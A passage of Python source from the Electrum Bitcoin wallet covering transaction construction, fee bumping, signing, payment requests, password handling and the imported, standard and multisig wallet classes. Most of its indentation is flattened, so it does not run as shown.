and self.network and self.network.config.has_fee_mempool():
exp_n = self.network.config.fee_to_depth(fee_per_byte)
if exp_n:
extra.append('%.2f MB'%(exp_n/1000000))
if height == TX_HEIGHT_LOCAL:
status = 3
elif height == TX_HEIGHT_UNCONF_PARENT:
status = 1
elif height == TX_HEIGHT_UNCONFIRMED:
status = 0
else:
status = 2
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = TX_STATUS[status] if status < 4 else time_str
if extra:
status_str += ' [%s]'%(', '.join(extra))
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
# check outputs
i_max = None
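        # i_max: index of the output whose value is '!', i.e. "spend max"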
for i, o in enumerate(outputs):
_type, data, value = o
if _type == TYPE_ADDRESS:
if not is_address(data):
raise Exception("Invalid bitcoin address: {}".format(data))
if value == '!':
if i_max is not None:
raise Exception("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise NoDynamicFeeEstimates()
for item in inputs:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
                # gap limit; if none, take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
# coin_chooser will set change address
change_addrs = []
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif isinstance(fixed_fee, Number):
fee_estimator = lambda size: fixed_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
raise Exception('Invalid argument fixed_fee: %s' % fixed_fee)
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.get_coin_chooser(config)
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold())
else:
# FIXME?? this might spend inputs with negative effective value...
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs[:])
fee = fee_estimator(tx.estimated_size())
amount = sendable - tx.output_value() - fee
if amount < 0:
raise NotEnoughFunds()
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs[:])
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
tx.locktime = self.get_local_height()
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
return addr in self.frozen_addresses
def set_frozen_state(self, addrs, freeze):
'''Set frozen state of the addresses to FREEZE, True or False'''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
self.storage.put('frozen_addresses', list(self.frozen_addresses))
return True
return False
def load_unverified_transactions(self):
# review transactions that are in the history
for addr, hist in self.history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
def start_threads(self, network):
self.network = network
if self.network is not None:
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
network.add_jobs([self.verifier, self.synchronizer])
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
self.network.remove_jobs([self.synchronizer, self.verifier])
self.synchronizer.release()
self.synchronizer = None
self.verifier = None
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx()
self.storage.write()
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
h = self.history.get(address,[])
if len(h) == 0:
return False
c, u, x = self.get_addr_balance(address)
return c + u + x == 0
def is_empty(self, address):
c, u, x = self.get_addr_balance(address)
return c+u+x == 0
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
for tx_hash, tx_height in h:
if tx_height <= 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
def bump_fee(self, tx, delta):
if tx.is_final():
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('transaction is final'))
tx = Transaction(tx.serialize())
tx.deserialize(force_full_parse=True) # need to parse inputs
inputs = copy.deepcopy(tx.inputs())
outputs = copy.deepcopy(tx.outputs())
for txin in inputs:
txin['signatures'] = [None] * len(txin['signatures'])
self.add_input_info(txin)
# use own outputs
s = list(filter(lambda x: self.is_mine(x[1]), outputs))
# ... unless there is none
if not s:
s = outputs
x_fee = run_hook('get_tx_extra_fee', self, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
s = filter(lambda x: x[1]!=x_fee_address, s)
# prioritize low value outputs, to get rid of dust
s = sorted(s, key=lambda x: x[2])
for o in s:
i = outputs.index(o)
otype, address, value = o
if value - delta >= self.dust_threshold():
outputs[i] = otype, address, value - delta
delta = 0
break
else:
del outputs[i]
delta -= value
if delta > 0:
continue
if delta > 0:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('could not find suitable outputs'))
locktime = self.get_local_height()
tx_new = Transaction.from_io(inputs, outputs, locktime=locktime)
tx_new.BIP_LI01_sort()
return tx_new
def cpfp(self, tx, fee):
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime)
def add_input_sig_info(self, txin, address):
raise NotImplementedError() # implemented by subclasses
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# segwit needs value to sign
if txin.get('value') is None and Transaction.is_input_value_needed(txin):
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_to_all_inputs(self, tx):
if tx.is_complete():
return
for txin in tx.inputs():
self.add_input_info(txin)
def can_sign(self, tx):
if tx.is_complete():
return False
# add info to inputs if we can; otherwise we might return a false negative:
self.add_input_info_to_all_inputs(tx) # though note that this is a side-effect
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash, ignore_timeout=False):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash, None)
if not tx and self.network:
try:
tx = Transaction(self.network.get_transaction(tx_hash))
except TimeoutException as e:
self.print_error('getting input txn from network timed out for {}'.format(tx_hash))
if not ignore_timeout:
raise e
return tx
def add_hw_info(self, tx):
# add previous tx for hw wallets
for txin in tx.inputs():
tx_hash = txin['prevout_hash']
# segwit inputs might not be needed for some hw wallets
ignore_timeout = Transaction.is_segwit_input(txin)
txin['prev_tx'] = self.get_input_tx(tx_hash, ignore_timeout)
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_mine(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None
tx.output_info = info
def sign_transaction(self, tx, password):
if self.is_watching_only():
return
self.add_input_info_to_all_inputs(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign. start with ready keystores.
for k in sorted(self.get_keystores(), key=lambda ks: ks.ready_to_sign(), reverse=True):
try:
if k.can_sign(tx):
k.sign_transaction(tx, password)
except UserCancelled:
continue
return tx
def get_unused_addresses(self):
# fixme: use slots from expired requests
domain = self.get_receiving_addresses()
return [addr for addr in domain if not self.history.get(addr)
and addr not in self.receive_requests.keys()]
def get_unused_address(self):
addrs = self.get_unused_addresses()
if addrs:
return addrs[0]
def get_receiving_address(self):
# always return an address
domain = self.get_receiving_addresses()
if not domain:
return
choice = domain[0]
for addr in domain:
if not self.history.get(addr):
if addr not in self.receive_requests.keys():
return addr
else:
choice = addr
return choice
def get_payment_status(self, address, amount):
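        # returns (paid, conf): sums outputs received at this address, most confirmed first,
        # until the requested amount is covered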
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def get_payment_request(self, addr, config):
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
out['URI'] = 'bitcoin:' + addr + '?amount=' + format_satoshis(out.get('amount'))
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
try:
baseurl = baseurl.replace(*rewrite)
except BaseException as e:
self.print_stderr('Invalid config setting for "url_rewrite". err:', e)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration):
timestamp = int(time.time())
_id = bh2u(Hash(addr + "%d"%timestamp))[0:10]
r = {'time':timestamp, 'amount':amount, 'exp':expiration, 'address':addr, 'memo':message, 'id':_id}
return r
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)[0]
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = pr.pki_data
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
def add_payment_request(self, req, config):
addr = req['address']
if not bitcoin.is_address(addr):
raise Exception(_('Invalid Bitcoin address.'))
if not self.is_mine(addr):
raise Exception(_('Address not in wallet.'))
amount = req.get('amount')
message = req.get('memo')
self.receive_requests[addr] = req
self.storage.put('payment_requests', self.receive_requests)
self.set_label(addr, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
return req
def remove_payment_request(self, addr, config):
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr)
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.storage.put('payment_requests', self.receive_requests)
return True
def get_sorted_requests(self, config):
def f(addr):
try:
return self.get_address_index(addr)
except:
return
keys = map(lambda x: (f(x), x), self.receive_requests.keys())
sorted_keys = sorted(filter(lambda x: x[0] is not None, keys))
return [self.get_payment_request(x[1], config) for x in sorted_keys]
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def add_address(self, address):
if address not in self.history:
self.history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self):
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return STO_EV_XPUB_PW
else:
return STO_EV_USER_PW
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, encrypt_storage=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = STO_EV_PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def get_depending_transactions(self, tx_hash):
"""Returns all (grand-)children of tx_hash in this wallet."""
children = set()
# TODO rewrite this to use self.spent_outpoints
for other_hash, tx in self.transactions.items():
for input in (tx.inputs()):
if input["prevout_hash"] == tx_hash:
children.add(other_hash)
children |= self.get_depending_transactions(other_hash)
return children
def txin_value(self, txin):
txid = txin['prevout_hash']
prev_n = txin['prevout_n']
for address, d in self.txo.get(txid, {}).items():
for n, v, cb in d:
if n == prev_n:
return v
# may occur if wallet is not synchronized
return None
def price_at_timestamp(self, txid, price_func):
"""Returns fiat price of bitcoin at the time tx got confirmed."""
height, conf, timestamp = self.get_tx_height(txid)
return price_func(timestamp if timestamp else time.time())
def unrealized_gains(self, domain, price_func, ccy):
coins = self.get_utxos(domain)
now = time.time()
p = price_func(now)
ap = sum(self.coin_price(coin['prevout_hash'], price_func, ccy, self.txin_value(coin)) for coin in coins)
lp = sum([coin['value'] for coin in coins]) * p / Decimal(COIN)
return lp - ap
def average_price(self, txid, price_func, ccy):
""" Average acquisition price of the inputs of a transaction """
input_value = 0
total_price = 0
for addr, d in self.txi.get(txid, {}).items():
for ser, v in d:
input_value += v
total_price += self.coin_price(ser.split(':')[0], price_func, ccy, v)
return total_price / (input_value/Decimal(COIN))
def coin_price(self, txid, price_func, ccy, txin_value):
"""
Acquisition price of a coin.
This assumes that either all inputs are mine, or no input is mine.
"""
if txin_value is None:
return Decimal('NaN')
cache_key = "{}:{}:{}".format(str(txid), str(ccy), str(txin_value))
result = self.coin_price_cache.get(cache_key, None)
if result is not None:
return result
if self.txi.get(txid, {}) != {}:
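            # some inputs are ours: value this coin at the average acquisition price of the spent inputs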
result = self.average_price(txid, price_func, ccy) * txin_value/Decimal(COIN)
self.coin_price_cache[cache_key] = result
return result
else:
fiat_value = self.get_fiat_value(txid, ccy)
if fiat_value is not None:
return fiat_value
else:
p = self.price_at_timestamp(txid, price_func)
return p * txin_value/Decimal(COIN)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class Imported_Wallet(Simple_Wallet):
# wallet made of imported addresses
wallet_type = 'imported'
txin_type = 'address'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
def is_watching_only(self):
return self.keystore is None
def get_keystores(self):
return [self.keystore] if self.keystore else []
def can_import_privkey(self):
return bool(self.keystore)
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore') if self.storage.get('keystore') else None
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
self.addresses = self.storage.get('addresses', {})
# fixme: a reference to addresses is needed
if self.keystore:
self.keystore.addresses = self.addresses
def save_addresses(self):
self.storage.put('addresses', self.addresses)
def can_import_address(self):
return self.is_watching_only()
def can_delete_address(self):
return True
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address):
return False
def is_mine(self, address):
return address in self.addresses
def get_fingerprint(self):
return ''
def get_addresses(self, include_change=False):
return sorted(self.addresses.keys())
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def import_address(self, address):
if not bitcoin.is_address(address):
return ''
if address in self.addresses:
return ''
self.addresses[address] = {}
self.storage.put('addresses', self.addresses)
self.storage.write()
self.add_address(address)
return address
def delete_address(self, address):
if address not in self.addresses:
return
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self.history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self.history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
pubkey = self.get_public_key(address)
self.addresses.pop(address)
if pubkey:
# delete key iff no other address uses it (e.g. p2pkh and p2wpkh for same key)
for txin_type in bitcoin.SCRIPT_TYPES.keys():
try:
addr2 = bitcoin.pubkey_to_address(txin_type, pubkey)
except NotImplementedError:
pass
else:
if addr2 in self.addresses:
break
else:
self.keystore.delete_imported_key(pubkey)
self.save_keystore()
self.storage.put('addresses', self.addresses)
self.storage.write()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.addresses[address].get('pubkey')
def import_private_key(self, sec, pw, redeem_script=None):
try:
txin_type, pubkey = self.keystore.import_privkey(sec, pw)
except Exception:
neutered_privkey = str(sec)[:3] + '..' + str(sec)[-2:]
raise BitcoinException('Invalid private key: {}'.format(neutered_privkey))
if txin_type in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
if redeem_script is not None:
raise BitcoinException('Cannot use redeem script with script type {}'.format(txin_type))
addr = bitcoin.pubkey_to_address(txin_type, pubkey)
elif txin_type in ['p2sh', 'p2wsh', 'p2wsh-p2sh']:
if redeem_script is None:
raise BitcoinException('Redeem script required for script type {}'.format(txin_type))
addr = bitcoin.redeem_script_to_address(txin_type, redeem_script)
else:
raise NotImplementedError(txin_type)
self.addresses[addr] = {'type':txin_type, 'pubkey':pubkey, 'redeem_script':redeem_script}
self.save_keystore()
self.save_addresses()
self.storage.write()
self.add_address(addr)
return addr
def get_redeem_script(self, address):
d = self.addresses[address]
redeem_script = d['redeem_script']
return redeem_script
def get_txin_type(self, address):
return self.addresses[address].get('type', 'address')
def add_input_sig_info(self, txin, address):
if self.is_watching_only():
x_pubkey = 'fd' + address_to_script(address)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
return
if txin['type'] in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
pubkey = self.addresses[address]['pubkey']
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
else:
raise NotImplementedError('imported wallets for p2sh are not implemented')
def pubkeys_to_address(self, pubkey):
for addr, v in self.addresses.items():
if v.get('pubkey') == pubkey:
return addr
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
k = 0
for a in addresses[::-1]:
            if self.history.get(a): break
k = k + 1
return k
def min_acceptable_gap(self):
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if self.history.get(a):
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def load_addresses(self):
super().load_addresses()
self._addr_to_addr_index = {} # key: address, value: (is_change, index)
for i, addr in enumerate(self.receiving_addresses):
self._addr_to_addr_index[addr] = (False, i)
for i, addr in enumerate(self.change_addresses):
self._addr_to_addr_index[addr] = (True, i)
def create_new_address(self, for_change=False):
assert type(for_change) is bool
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self._addr_to_addr_index[address] = (for_change, n)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
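        # keep creating addresses until none of the trailing `limit` addresses has been
        # used (see address_is_old)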
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if list(map(lambda a: self.address_is_old(a), addresses[-limit:] )) == limit*[False]:
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address):
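        # an address is beyond the gap limit if none of the preceding `limit` addresses has any history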
is_change, i = self.get_address_index(address)
addr_list = self.get_change_addresses() if is_change else self.get_receiving_addresses()
limit = self.gap_limit_for_change if is_change else self.gap_limit
if i < limit:
return False
prev_addresses = addr_list[max(0, i - limit):max(0, i)]
for addr in prev_addresses:
if self.history.get(addr):
return False
return True
def is_mine(self, address):
return address in self._addr_to_addr_index
def get_address_index(self, address):
return self._addr_to_addr_index[address]
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def pubkeys_to_address(self, pubkeys):
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return transaction.multisig_script(sorted(pubkeys), self.m)
def get_redeem_script(self, address):
pubkeys = self.get_public_keys(address)
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return redeem_script
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return STO_EV_USER_PW
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
# pubkeys is set to None to signal that x_pubkeys are unsorted
derivation = self.get_address_index(address)
x_pubkeys_expected = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
x_pubkeys_actual = txin.get('x_pubkeys')
# if 'x_pubkeys' is already set correctly (ignoring order, as above), leave it.
# otherwise we might delete signatures
if x_pubkeys_actual and set(x_pubkeys_actual) == set(x_pubkeys_expected):
return
txin['x_pubkeys'] = x_pubkeys_expected
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported': Imported_Wallet
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
# former WalletFactory
class Wallet(object):
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
